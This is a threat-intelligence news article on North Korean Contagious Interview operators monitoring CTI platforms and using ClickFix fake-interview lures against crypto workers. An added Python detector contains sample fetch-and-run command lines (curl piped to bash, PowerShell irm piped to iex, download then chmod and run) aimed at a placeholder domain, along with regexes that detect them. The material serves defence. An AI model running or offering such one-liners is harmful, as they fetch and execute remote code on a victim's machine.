The SentinelLABS intelligence team, in collaboration with Validin, has published an in-depth analysis of North Korea-aligned actors using cyber threat intelligence (CTI) platforms to monitor their own exposure, scout for new infrastructure, and refine their operations. The findings shed light on how the group behind the Contagious Interview campaign, linked to the Lazarus umbrella cluster, consumes public CTI resources while deploying the ClickFix social engineering technique to compromise victims.
According to SentinelLABS, “North Korea-aligned threat actors actively monitor cyber threat intelligence to detect infrastructure exposure and scout for new assets.”
Between March and June 2025, researchers observed the Contagious Interview operators registering accounts on Validin, an internet intelligence platform, just hours after the company published a blog post about Lazarus infrastructure. The threat actors used Gmail accounts already tied to previous operations, suggesting deliberate coordination.
Although blocked quickly, they persisted—switching to new domains like versusx[.]us and quiz-nest[.]com to regain access. As the report explains, “We observed that the Contagious Interview threat actors engaged in coordinated activity and likely operated in teams to investigate threat intelligence related to their infrastructure and to monitor for signs of detection.”
Indicators even suggest that the group used Slack for real-time collaboration, with links to CTI searches shared across multiple accounts in quick succession.
Despite carefully checking CTI sources like Validin, VirusTotal, and Maltrail, the attackers made only sporadic changes to their infrastructure. Instead, they focused on rapidly deploying new assets whenever service providers took down old ones.
SentinelLABS notes: “This indicates a strategic focus on continuously replacing disrupted infrastructure with new assets to sustain operations and high victim engagement.”
OPSEC failures also provided researchers with unusual insights. Some malware servers inadvertently exposed directory contents and error logs, revealing usernames, deployment timelines, and even ContagiousDrop applications used to distribute malware.
Contagious Interview campaigns are best known for their ClickFix lure, which targets job seekers. Victims are invited to bogus interviews, then prompted to paste and run a command (a curl one-liner) under the guise of fixing a “camera error,” and end up downloading and running malware from attacker-controlled servers.
The servers deliver operating system–specific payloads (Windows, macOS, Linux) and notify operators by email whenever victims engage.
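What the ClickFix chain looks like from the endpoint side, as an added example that is not part of the SentinelLABS/Validin report: a small detector run over constructed process-execution records (hostnames, usernames, the placeholder domain example.invalid and the command lines are all made up for illustration). The three rules are generic download-and-execute idioms for the three operating systems the servers target, not indicators taken from the report.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample process-execution records (hypothetical, not from the report):
# (hostname, user, parent process, command line). example.invalid is a placeholder domain.
SAMPLE_EVENTS: List[Tuple[str, str, str, str]] = [
    ("mac-01", "alice", "Terminal", "curl -sSL https://example.invalid/fix-camera.sh | bash"),
    ("win-07", "bob", "explorer.exe", 'powershell -w hidden -c "irm https://example.invalid/vcam.ps1 | iex"'),
    ("lnx-03", "carol", "bash", "curl -fsSL -o /tmp/.drv https://example.invalid/drv && chmod +x /tmp/.drv && /tmp/.drv"),
    ("lnx-03", "carol", "bash", "curl -sI https://example.invalid/status"),  # benign: header check only
    ("mac-02", "dave", "Terminal", "brew install ffmpeg"),                   # benign
]

# Generic download-and-execute idioms (assumed patterns, one per OS family).
# macOS/Linux: fetch a script and pipe it straight into a shell.
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")
# Windows: PowerShell web download fed into Invoke-Expression.
PS_DOWNLOAD_EXEC = re.compile(
    r"\b(?:irm|iwr|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile)\b"
    r".*?\b(?:iex|Invoke-Expression)\b",
    re.IGNORECASE,
)
# Any Unix: download to a file, then make it executable or run it in the same command line.
DOWNLOAD_TO_FILE = re.compile(r"\b(?:curl|wget)\b.*?\s(?:-o|--output)\s+(\S+)")


@dataclass(frozen=True)
class Finding:
    host: str
    user: str
    rule: str
    cmdline: str


def classify(cmdline: str) -> Optional[str]:
    """Return the name of the first download-and-execute rule the command line matches, or None."""
    if PIPE_TO_SHELL.search(cmdline):
        return "pipe-to-shell"
    if PS_DOWNLOAD_EXEC.search(cmdline):
        return "powershell-download-exec"
    m = DOWNLOAD_TO_FILE.search(cmdline)
    if m:
        path = re.escape(m.group(1))
        rest = cmdline[m.end():]
        made_executable = re.search(r"chmod\s+\+x\s+" + path, rest)
        invoked = re.search(r"(?:&&|;|\|\|)\s*" + path + r"(?:\s|$)", rest)
        if made_executable or invoked:
            return "download-then-execute"
    return None


def detect_clickfix(events: List[Tuple[str, str, str, str]]) -> List[Finding]:
    """Flag every event whose command line matches a download-and-execute rule."""
    findings = []
    for host, user, _parent, cmdline in events:
        rule = classify(cmdline)
        if rule:
            findings.append(Finding(host, user, rule, cmdline))
    return findings


if __name__ == "__main__":
    for f in detect_clickfix(SAMPLE_EVENTS):
        print(f"{f.host} {f.user} [{f.rule}] {f.cmdline}")
```

The point of the third rule is that a plain `curl -o` is common and benign on its own; it is the download followed by `chmod +x` or direct invocation of the same path in one command line that marks a paste-and-run lure. In a real deployment the parent process (a browser or terminal spawned right after a browser session) is worth adding as a second signal.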
Log files exposed by Contagious Interview infrastructure revealed over 230 victims between January and March 2025 alone. SentinelLABS stresses that the real number is likely far higher.
Targets were primarily linked to the cryptocurrency and blockchain industry, working in roles such as Portfolio Manager, Investment Manager, and Senior Product Manager. Impersonated companies included Robinhood, Archblock, and eToro.
This aligns with North Korea’s broader strategy of using cyber operations to generate revenue for sanctions evasion and weapons development.